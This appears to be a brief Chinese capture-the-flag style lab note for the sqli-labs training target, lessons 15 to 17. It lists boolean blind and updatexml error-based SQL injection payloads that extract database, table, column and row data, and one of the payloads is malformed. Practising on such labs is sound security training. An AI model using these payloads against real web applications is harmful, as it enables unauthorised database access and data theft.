【靶场训练】sql-libs

less-15

布尔盲注

' or (length(database())=8）-- lq 判断数据库长度

'or (substr(database(),1,1)='s' -- lq) 猜库名

'or (substr(select table_name from information_schema.tables where table_schema='security' limit 0,1,1,1)='s' -- lq) 猜表名

.......

less-16

布尔盲注闭合方式为("")

less-17

报错注入攻击

账号输入admin。

' and updatexml(1,concat('~',(select database()),'~'),1) -- lq  库名

' and updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'~'),1) -- lq      判断表名

' and updatexml(1,concat('~',(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),'~'),1) -- lq            判断字段名

' and updatexml(1,concat('~',(select id from security.emails limit 0,1),'~'),1) -- lq  表中数据